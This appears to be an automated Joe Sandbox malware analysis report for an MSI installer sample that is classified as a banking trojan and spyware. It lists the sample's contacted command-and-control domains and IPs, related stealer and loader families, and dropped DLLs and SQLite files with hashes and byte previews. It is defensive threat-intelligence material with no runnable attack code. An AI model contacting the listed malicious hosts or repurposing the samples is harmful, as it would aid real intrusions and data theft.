https://www.advancedinstaller.com	zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	false		high
https://dogirafer.com/est/-	explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/3p	explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://outlook.com_	explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
https://huanvn.com:6542/stop.phpl	rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com:443/en-us/feed	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://r10.i.lencr.org/0	rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dogirafer.com/V=	explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42	explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.16.251	reateberam.com	United States	13335	CLOUDFLARENETUS	true
104.21.68.89	dogirafer.com	United States	13335	CLOUDFLARENETUS	true
103.57.249.207	huanvn.com	India	17747	SITINETWORS-IN-APSITINETWORKSLIMITEDIN	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566849
Start date and time:	2024-12-02 18:38:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zdi.txt.msi
Detection:	MAL
Classification:	mal100.spre.bank.troj.spyw.evad.winMSI@69/30@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 51 Number of non-executed functions: 310
Cookbook Comments:	Found application associated with file extension: .msi Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.20.68.210, 2.20.68.201
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: zdi.txt.msi

Simulations

Behavior and APIs

Time	Type	Description
12:40:00	API Interceptor	11860704x Sleep call for process: explorer.exe modified
12:41:32	API Interceptor	2x Sleep call for process: WMIC.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	Wc pay benefit.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	file.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Nymaim	Browse	199.232.210.172
	file.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	RFQ-2309540_27112024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	199.232.210.172
	faktura461250706050720242711#U00b7pdf.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	11315781264#U00b7pdf.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	30180908_signed#U00b7pdf.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	file.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	factura_servicios00777.docm	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.paypal.com/myaccount/transaction/details/7PH333382L561513K?v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000298&utm_unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&ppid=RT000298&cnac=US&rsta=en_US%28en-US%29&unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&calc=0052231041435&unp_tpcid=email-standard-transaction-unilateral&page=main%3Aemail%3ART000298&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&xt=145585%2C150948%2C104038	Get hash	malicious	Unknown	Browse	1.1.1.1
	Wc pay benefit.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	http://mailgun.internationalsos.com/c/eJxUzcGO2yoYxfGngR0RYIxhwcKO4d5ITRuNpyN1ieFLhtYGy7it5u2rLGd5jvTX77_rdIVa_QMuo-GKMqnahuEpHRDKDpcD1stoUDe0cuDtKAbCGtsRofuBaMktGRRzfSdGRgVD3fip_OLz47d_gIH86X-DvaaSDcPTR30K0UgcjQAW7hgM6xqupNSa4nej52YOSrVRNJ7OAhRwJmcRwj3ArEKHkxnP0tmzUoRa3hHBdEsGJzviBqbcMGrba4cE_T5ZNv3f36br622iDV7M-3FsFTU94g5xF2Jmp5QP2LM_Usl-qaWeQlkRdwRx97PWFWLyiLvN5whrCog7lxaoiLvocyQb2SK5P2fKx0JqqWQrSypk9R-EUy5OW7wjy5GiSJ_xbl6-_Ti92Zfptb_d7Fck6F7Cr7-lLE8X_zH8XwAAAP__jX59nw	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://pa.compassionatetraveler.org/kqawsedrftgyhugtfrdesedrftgyhujwsedrfgtyhhygtfrderftghyujikiujhygtfrtgyhujjuhygtfrtgyhuji%20	Get hash	malicious	Unknown	Browse	172.66.40.234
	http://ar-oracle.com	Get hash	malicious	Unknown	Browse	104.18.161.117
	Employee_Important_Message.pdf	Get hash	malicious	Unknown	Browse	104.26.13.205
	ATT4802.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Flumroc.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	Flumroc.docx	Get hash	malicious	Unknown	Browse	104.18.94.41
SITINETWORS-IN-APSITINETWORKSLIMITEDIN	loligang.mips.elf	Get hash	malicious	Mirai	Browse	202.142.118.100
	na.elf	Get hash	malicious	Gafgyt	Browse	103.225.178.92
	msas.msi	Get hash	malicious	ORPCBackdoor	Browse	103.57.249.42
	msas.msi	Get hash	malicious	ORPCBackdoor	Browse	103.57.249.42
	sstn.exe	Get hash	malicious	Unknown	Browse	103.57.250.204
	sstn.exe	Get hash	malicious	Unknown	Browse	103.57.250.204
	VKkfiTAZXP.elf	Get hash	malicious	Gafgyt, Mirai	Browse	103.225.178.98
	YnO77q8WhV.elf	Get hash	malicious	Unknown	Browse	45.117.200.73
	3A8YbQ0RZ7.dll	Get hash	malicious	Qbot	Browse	202.142.98.62
	oHqZ0zT7DZ.elf	Get hash	malicious	Mirai	Browse	202.142.98.144
CLOUDFLARENETUS	https://www.paypal.com/myaccount/transaction/details/7PH333382L561513K?v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000298&utm_unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&ppid=RT000298&cnac=US&rsta=en_US%28en-US%29&unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&calc=0052231041435&unp_tpcid=email-standard-transaction-unilateral&page=main%3Aemail%3ART000298&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&xt=145585%2C150948%2C104038	Get hash	malicious	Unknown	Browse	1.1.1.1
	Wc pay benefit.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	http://mailgun.internationalsos.com/c/eJxUzcGO2yoYxfGngR0RYIxhwcKO4d5ITRuNpyN1ieFLhtYGy7it5u2rLGd5jvTX77_rdIVa_QMuo-GKMqnahuEpHRDKDpcD1stoUDe0cuDtKAbCGtsRofuBaMktGRRzfSdGRgVD3fip_OLz47d_gIH86X-DvaaSDcPTR30K0UgcjQAW7hgM6xqupNSa4nej52YOSrVRNJ7OAhRwJmcRwj3ArEKHkxnP0tmzUoRa3hHBdEsGJzviBqbcMGrba4cE_T5ZNv3f36br622iDV7M-3FsFTU94g5xF2Jmp5QP2LM_Usl-qaWeQlkRdwRx97PWFWLyiLvN5whrCog7lxaoiLvocyQb2SK5P2fKx0JqqWQrSypk9R-EUy5OW7wjy5GiSJ_xbl6-_Ti92Zfptb_d7Fck6F7Cr7-lLE8X_zH8XwAAAP__jX59nw	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://pa.compassionatetraveler.org/kqawsedrftgyhugtfrdesedrftgyhujwsedrfgtyhhygtfrderftghyujikiujhygtfrtgyhujjuhygtfrtgyhuji%20	Get hash	malicious	Unknown	Browse	172.66.40.234
	http://ar-oracle.com	Get hash	malicious	Unknown	Browse	104.18.161.117
	Employee_Important_Message.pdf	Get hash	malicious	Unknown	Browse	104.26.13.205
	ATT4802.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Flumroc.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	Flumroc.docx	Get hash	malicious	Unknown	Browse	104.18.94.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.251 104.21.68.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.251 104.21.68.89
	Full_Setup_v24.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.251 104.21.68.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.251 104.21.68.89
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.16.251 104.21.68.89
	Swiftcopy.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.16.251 104.21.68.89
	New Order.xls	Get hash	malicious	Unknown	Browse	104.21.16.251 104.21.68.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.251 104.21.68.89
	REMITTANCE COPY FOR INVOICE PAYMENT.exe	Get hash	malicious	DBatLoader	Browse	104.21.16.251 104.21.68.89
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.251 104.21.68.89

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSI468D.tmp	merd.msi	Get hash	malicious	Unknown	Browse
	medk.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	lavi.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse
	Document-v09-42-38.js	Get hash	malicious	BruteRatel	Browse
	Document-v05-53-20.js	Get hash	malicious	BruteRatel, Latrodectus	Browse
	FW3x3p4eZ5.msi	Get hash	malicious	Bazar Loader, BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse
	Document-19-06-38.js	Get hash	malicious	BruteRatel	Browse
	Document-14-33-26.js	Get hash	malicious	Unknown	Browse
	net.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\424595.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	1208
Entropy (8bit):	5.705388295580411
Encrypted:	false
SSDEEP:	24:EOgRryjy2x6YflyjC6QoJ/lQahRpULWj8jxFPzZVDhiSWDpj8jAuWj8jDLK:hyoyxYdoNbUybL+HPvD8SC+Ah+S
MD5:	93D1FFA38C217A463D62EA63877CA7C9
SHA1:	06695B846A6A51350B61FE87C129620ACAA7935C
SHA-256:	BF03C203088B3D5FA9829DA45AF28C9768E25FE1C5E654DA58D8A76D1EBEEC48
SHA-512:	5AFDE3520094F6D52A1240A33278E63F95D542DD7ECD9137440870C8122870EE974E0FB01A0910406F1435B8F983C48B503BBDEA7706A27B03B062BA5562BE24
Malicious:	false
Preview:	...@IXOS.@.....@.d.Y.@.....@.....@.....@.....@.....@......&.{998A301A-3216-4DC9-93E2-7045B0436D77}..TimeService..zdi.txt.msi.@.....@U....@.....@........&.{ECDEC887-FE4B-4D4C-AEE0-0B38AF17C8D1}.....@.....@.....@.....@.......@.....@.....@.......@......TimeService......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{998A301A-3216-4DC9-93E2-7045B0436D77}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{998A301A-3216-4DC9-93E2-7045B0436D77}.@......&.{E10D9A62-ED71-41D8-87ED-0266356C1410}&.{998A301A-3216-4DC9-93E2-7045B0436D77}.@........CreateFolders..Creating folders..Folder: [1]#.;.C:\Users\user\AppData\Roaming\TimeService LLC\TimeService\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]....C:\Users\user\AppData\Roaming\....'.C:\Users\user\AppData\Roaming\wait.dll....WriteRegistryValues..Writing system registry values..Key

C:\Users\user\AppData\Local\Temp\Asxo.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ixav.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ixav.tmp-shm

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\muez.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ucsafe64.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vapaef4.tmp

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	modified
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wait.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2151936
Entropy (8bit):	6.567244418107318
Encrypted:	false
SSDEEP:	24576:JgWryG1z2cMbUhtEx+GRy1tWfxFDIHS4KGwt6nbmBdve1/JznfTWj+bXD:So0lolWfxeHlBwt6n+d21V7Wj+DD
MD5:	50BD4FF60C931861E46C801A60F9E916
SHA1:	13B14FB516FA726CC5FA9AF17A2F93FF49449830
SHA-256:	F2170F7DC2F97434EF4514ED4272DC8792177038A085F248BA33F9259720AFDA
SHA-512:	A05C4097DCA743D0D23A7E3A59FDE91576E676A71B38D7DAF744D6705AD19B651AAC233CC53F0162CA1BBBFE2B8B0B83E58B3B7AC6E7EF66D9B3B43CBC0B48EB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..........................&.......]......................................................]...Q..............T......T......T.......T......Q.9....T......Rich...................PE..d...@.+g.........." ................ q........................................$.....W~....`A............................................P............ ..................L....$..,..P...p.......................(...............................`....................text...r........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.didat..P..... .....................@....tls.......... .....................@....rsrc......... .....................@..@.reloc...,....$....... .............@..B........................................................................................................

C:\Windows\Installer\424593.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {ECDEC887-FE4B-4D4C-AEE0-0B38AF17C8D1}, Number of Words: 10, Subject: TimeService, Author: TimeService LLC, Name of Creating Application: TimeService, Template: ;1033, Comments: Runtime service TimeService., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	2254336
Entropy (8bit):	7.48425232853397
Encrypted:	false
SSDEEP:	49152:Tw13YQW8zBQSc0ZnSKBZKumZr7ADAH8THY8PA4pWj+9f:MYH0Zn3K/AgSxpWK
MD5:	71F04FE0AFC51FEE5E68E33431A7FB51
SHA1:	81952C2D3BB3558EC36900877080DBAE0DC6A8BB
SHA-256:	61365E29247428B26C8A6CA0D6326BBD04C2C798D7ABAD1660338CE3C11C68C4
SHA-512:	1852553740EEEE5BFF381C26D3EDAA1CF3A4D6780A9775A99F678E507C9C51AF2370C8DE97A3FAEACC032665DE3359E3F32F9AF70B0612EA1E663B7BDE68BE73
Malicious:	false
Preview:	......................>...................#...................................E.......a...............................(...)......+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P.......................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)......1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI468D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: merd.msi, Detection: malicious, Browse Filename: medk.msi, Detection: malicious, Browse Filename: lavi.msi, Detection: malicious, Browse Filename: Document-v09-42-38.js, Detection: malicious, Browse Filename: Document-v05-53-20.js, Detection: malicious, Browse Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse Filename: Document-19-06-38.js, Detection: malicious, Browse Filename: Document-14-33-26.js, Detection: malicious, Browse Filename: net.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI46EC.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446944
Entropy (8bit):	6.403916470886214
Encrypted:	false
SSDEEP:	6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
MD5:	475D20C0EA477A35660E3F67ECF0A1DF
SHA1:	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
SHA-256:	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
SHA-512:	99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
